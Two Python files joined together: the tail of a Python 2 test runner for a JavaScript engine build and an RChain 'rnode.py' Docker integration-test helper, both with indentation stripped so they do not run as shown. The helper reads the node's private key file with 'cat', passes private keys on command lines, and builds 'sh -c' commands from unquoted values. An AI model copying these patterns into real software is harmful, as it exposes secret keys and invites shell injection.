SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode);
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE;
if utils.IsWindows():
popen_args = '"' + subprocess.list2cmdline(args) + '"'
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX;
prev_error_mode = Win32SetErrorMode(error_mode);
Win32SetErrorMode(error_mode | prev_error_mode);
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
try:
os.unlink(name)
except OSError, e:
PrintError("os.unlink() " + str(e))
def Execute(args, context, timeout=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
)
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def ExecuteNoCapture(args, context, timeout=None):
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
)
return CommandOutput(exit_code, False, "", "")
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[]]
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, mode):
for v in VARIANT_FLAGS:
tests = self.GetConfiguration(context).ListTests(current_path, path, mode)
for t in tests: t.variant_flags = v
result += tests
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, mode)
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : []}
TIMEOUT_SCALEFACTOR = {
'debug' : 4,
'release' : 1 }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
def GetVm(self, mode):
if mode == 'debug':
name = 'build/debug/node_g'
else:
name = 'build/default/node'
if utils.IsWindows() and not name.endswith('.exe'):
name = os.path.abspath(name + '.exe')
return name
def GetVmCommand(self, testcase, mode):
return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)
def GetVmFlags(self, testcase, mode):
return testcase.variant_flags + FLAGS[mode]
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[mode]
def RunTestCases(cases_to_run, progress, tasks):
progress = PROGRESS_INDICATORS[progress](cases_to_run)
return progress.Run(tasks)
def BuildRequirements(context, requirements, mode, scons_flags):
command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
+ requirements
+ scons_flags)
output = ExecuteNoCapture(command_line, context)
return output.exit_code == 0
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left= Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
default=[], action="append")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--no-build", help="Don't build requirements",
default=True, action="store_true")
result.add_option("--build-only", help="Only build requirements, don't run the tests",
default=False, action="store_true")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--simulator", help="Run tests with architecture simulator",
default='none')
result.add_option("--special-command", default=None)
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.mode = options.mode.split(',')
for mode in options.mode:
if not mode in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
if options.simulator != 'none':
# Simulator argument was set. Make sure arch and simulator agree.
if options.simulator != options.arch:
if options.arch == 'none':
options.arch = options.simulator
else:
print "Architecture %s does not match sim %s" %(options.arch, options.simulator)
return False
# Ensure that the simulator argument is handed down to scons.
options.scons_flags.append("simulator=" + options.simulator)
else:
# If options.arch is not set by the command line and no simulator setting
# was found, set the arch to the guess.
if options.arch == 'none':
options.arch = ARCH_GUESS
options.scons_flags.append("arch=" + options.arch)
if options.snapshot:
options.scons_flags.append("snapshot=on")
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(nocrash)4d tests are expected to be flaky but not crash
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFlaky(o):
return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
BUILT_IN_TESTS = ['simple', 'pummel', 'message', 'internet']
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
shell = abspath(options.shell)
buildspace = dirname(shell)
context = Context(workspace, buildspace, VERBOSE,
shell,
options.timeout,
GetSpecialCommandProcessor(options.special_command),
options.suppress_dialogs,
options.store_unexpected_output)
# First build the required targets
if not options.no_build:
reqs = [ ]
for path in paths:
reqs += root.GetBuildRequirements(path, context)
reqs = list(set(reqs))
if len(reqs) > 0:
if options.j != 1:
options.scons_flags += ['-j', str(options.j)]
if not BuildRequirements(context, reqs, options.mode, options.scons_flags):
return 1
# Just return if we are only building the targets for running the tests.
if options.build_only:
return 0
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for mode in options.mode:
if not exists(context.GetVm(mode)):
print "Can't find shell executable: '%s'" % context.GetVm(mode)
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': options.arch,
'simulator': options.simulator
}
test_list = root.ListTests([], path, context, mode)
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = globally_unused_rules.intersection(unused_rules)
all_cases += cases
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
return SKIP in case.outcomes or SLOW in case.outcomes
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 0
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
rnode.py
|
import functools
import re
import os
import queue
import shlex
import string
import shutil
import logging
from logging import (Logger)
import threading
from threading import Event
import contextlib
from multiprocessing import Queue, Process
from typing import (
Dict,
List,
Tuple,
Optional,
Generator,
AbstractSet,
Set
)
from rchain.crypto import PrivateKey
from rchain.certificate import get_node_id_raw
from rchain.vault import DEFAULT_PHLO_LIMIT, DEFAULT_PHLO_PRICE
from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.backends import default_backend
from docker.client import DockerClient
from docker.models.containers import Container
from docker.models.containers import ExecResult
from .common import (
make_tempdir,
make_tempfile,
TestingContext,
NonZeroExitCodeError,
GetBlockError,
ParsingError,
SynchronyConstraintError,
NotAnActiveValidatorError
)
from .wait import (
wait_for_node_started,
wait_for_approved_block_received_handler_state,
)
from .error import(
RNodeAddressNotFoundError,
CommandTimeoutError,
)
from .utils import (
extract_block_count_from_show_blocks,
parse_show_block_output,
parse_show_blocks_output,
extract_block_hash_from_propose_output,
extract_deploy_id_from_deploy_output,
parse_mvdag_str,
BlockInfo,
LightBlockInfo
)
DEFAULT_IMAGE = os.environ.get("DEFAULT_IMAGE", "rchain-integration-tests:latest")
_PB_REPEATED_STR_SEP = "#$"
rnode_binary = '/opt/docker/bin/rnode'
rnode_directory = "/var/lib/rnode"
rnode_deploy_dir = "{}/deploy".format(rnode_directory)
rnode_bonds_file = '{}/genesis/bonds.txt'.format(rnode_directory)
rnode_wallets_file = '{}/genesis/wallets.txt'.format(rnode_directory)
rnode_certificate_path = '{}/node.certificate.pem'.format(rnode_directory)
rnode_key_path = '{}/node.key.pem'.format(rnode_directory)
rnode_default_launcher_args = [
# We don't want the launcher script (generated by sbt-native-packager) to
# swallow first java error and exit with confusing "No java installation was
# detected" message.
'-no-version-check',
]
class Node:
def __init__(self, *, container: Container, deploy_dir: str, command_timeout: int, network: str) -> None:
self.container = container
self.local_deploy_dir = deploy_dir
self.remote_deploy_dir = rnode_deploy_dir
self.name = container.name
self.command_timeout = command_timeout
self.network = network
self.terminate_background_logging_event = threading.Event()
self.background_logging = LoggingThread(
container=container,
logger=logging.getLogger('peers'),
terminate_thread_event=self.terminate_background_logging_event,
)
self.background_logging.setDaemon(True)
self.background_logging.start()
def __repr__(self) -> str:
return '<Node(name={})>'.format(repr(self.name))
def get_node_pem_cert(self) -> bytes:
return self.shell_out("cat", rnode_certificate_path).encode('utf8')
def get_node_pem_key(self) -> bytes:
return self.shell_out("cat", rnode_key_path).encode('utf8')
def get_node_id_raw(self) -> bytes:
key = load_pem_private_key(self.get_node_pem_key(), None, default_backend())
return get_node_id_raw(key)
def logs(self) -> str:
return self.container.logs().decode('utf-8')
def get_rnode_address(self) -> str:
log_content = self.logs()
regex = "Listening for traffic on (rnode://.+@{name}\\?protocol=\\d+&discovery=\\d+)\\.$".format(name=self.container.name)
match = re.search(regex, log_content, re.MULTILINE | re.DOTALL)
if match is None:
raise RNodeAddressNotFoundError(regex)
address = match.group(1)
return address
def get_metrics(self) -> str:
return self.shell_out('curl', '-s', 'http://localhost:40403/metrics')
def get_connected_peers_metric_value(self) -> str:
try:
return self.shell_out('sh', '-c', 'curl -s http://localhost:40403/metrics | grep ^rchain_comm_rp_connect_peers\\ ')
except NonZeroExitCodeError as e:
if e.exit_code == 1:
return ''
raise
def get_peer_node_ip(self, network_name: str) -> str:
self.container.reload()
network_config = self.container.attrs['NetworkSettings']['Networks'][network_name]
assert network_config is not None
return network_config['IPAddress']
def cleanup(self) -> None:
self.container.remove(force=True, v=True)
self.terminate_background_logging_event.set()
self.background_logging.join()
def show_blocks_with_depth(self, depth: int) -> str:
return self.rnode_command('show-blocks', '--depth', str(depth), stderr=False)
def show_block(self, hash: str) -> str:
return self.rnode_command('show-block', hash, stderr=False)
def get_blocks_count(self, depth: int) -> int:
show_blocks_output = self.show_blocks_with_depth(depth)
return extract_block_count_from_show_blocks(show_blocks_output)
def show_blocks_parsed(self, depth: int) -> List[LightBlockInfo]:
show_blocks_output = self.show_blocks_with_depth(depth)
return parse_show_blocks_output(show_blocks_output)
def show_block_parsed(self, hash: str) -> BlockInfo:
show_block_output = self.show_block(hash)
block_info = parse_show_block_output(show_block_output)
return block_info
def get_block(self, block_hash: str) -> str:
try:
return self.rnode_command('show-block', block_hash, stderr=False)
except NonZeroExitCodeError as e:
raise GetBlockError(command=e.command, exit_code=e.exit_code, output=e.output)
# Too low level -- do not use directly. Prefer shell_out() instead.
def _exec_run_with_timeout(self, cmd: Tuple[str, ...], stderr: bool = True) -> Tuple[int, str]:
control_queue: queue.Queue = Queue(1)
def command_process() -> None:
exec_result: ExecResult = self.container.exec_run(cmd, stderr=stderr)
control_queue.put((exec_result.exit_code, exec_result.output.decode('utf-8')))
process = Process(target=command_process)
logging.info("COMMAND {} {}".format(self.name, cmd))
process.start()
try:
exit_code, output = control_queue.get(True, self.command_timeout)
except queue.Empty:
raise CommandTimeoutError(cmd, self.command_timeout)
finally:
process.terminate()
if exit_code != 0:
for line in output.splitlines():
logging.info('{}: {}'.format(self.name, line))
logging.warning("EXITED {} {} {}".format(self.name, cmd, exit_code))
else:
for line in output.splitlines():
logging.debug('{}: {}'.format(self.name, line))
logging.debug("EXITED {} {} {}".format(self.name, cmd, exit_code))
return exit_code, output
def shell_out(self, *cmd: str, stderr: bool = True) -> str:
exit_code, output = self._exec_run_with_timeout(cmd, stderr=stderr)
if exit_code != 0:
raise NonZeroExitCodeError(command=cmd, exit_code=exit_code, output=output)
return output
def rnode_command(self, *node_args: str, stderr: bool = True) -> str:
return self.shell_out(rnode_binary, *rnode_default_launcher_args, *node_args, stderr=stderr)
def eval(self, rho_file_path: str) -> str:
return self.rnode_command('eval', rho_file_path)
def deploy(self, rho_file_path: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE) -> str:
try:
output = self.rnode_command('deploy', '--private-key={}'.format(private_key.to_hex()), '--phlo-limit={}'.format(phlo_limit), '--phlo-price={}'.format(phlo_price), rho_file_path, stderr=False)
deploy_id = extract_deploy_id_from_deploy_output(output)
return deploy_id
except NonZeroExitCodeError as e:
if "Parsing error" in e.output:
raise ParsingError(command=e.command, exit_code=e.exit_code, output=e.output)
# TODO out of phlogiston error
raise e
def get_vdag(self) -> str:
return self.rnode_command('vdag', stderr=False)
def get_mvdag(self) -> str:
return self.rnode_command('mvdag', stderr=False)
def get_parsed_mvdag(self) -> Dict[str, Set[str]]:
return parse_mvdag_str(self.get_mvdag())
def deploy_string(self, rholang_code: str, private_key: str, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE) -> str:
quoted_rholang = shlex.quote(rholang_code)
deploy_out = self.shell_out('sh', '-c', 'echo {quoted_rholang} >/tmp/deploy_string.rho && {rnode_binary} deploy --private-key={private_key} --phlo-limit={phlo_limit} --phlo-price={phlo_price} /tmp/deploy_string.rho'.format(
rnode_binary=rnode_binary,
quoted_rholang=quoted_rholang,
private_key=private_key,
phlo_limit=phlo_limit,
phlo_price=phlo_price
), stderr=False)
return extract_deploy_id_from_deploy_output(deploy_out)
def find_deploy(self, deploy_id: str) -> LightBlockInfo:
output = self.rnode_command("find-deploy", "--deploy-id", deploy_id, stderr=False)
block_info = parse_show_blocks_output(output)
return block_info[0]
def propose(self) -> str:
try:
output = self.rnode_command('propose', stderr=False)
block_hash = extract_block_hash_from_propose_output(output)
return block_hash
except NonZeroExitCodeError as e:
if "Must wait for more blocks from other validators" in e.output:
raise SynchronyConstraintError(command=e.command, exit_code=e.exit_code, output=e.output)
if "ReadOnlyMode" in e.output:
raise NotAnActiveValidatorError(command=e.command, exit_code=e.exit_code, output=e.output)
raise e
def last_finalized_block(self) -> BlockInfo:
output = self.rnode_command('last-finalized-block', stderr=False)
block_info = parse_show_block_output(output)
return block_info
def repl(self, rholang_code: str, stderr: bool = False) -> str:
quoted_rholang_code = shlex.quote(rholang_code)
output = self.shell_out(
'sh',
'-c',
'echo {quoted_rholang_code} | {rnode_binary} repl'.format(quoted_rholang_code=quoted_rholang_code,rnode_binary=rnode_binary),
stderr=stderr,
)
return output
def cat_forward_file(self, public_key: str) -> str:
return self.shell_out('cat', '/opt/docker/forward_{}.rho'.format(public_key))
def cat_bond_file(self, public_key: str) -> str:
return self.shell_out('cat', '/opt/docker/bond_{}.rho'.format(public_key))
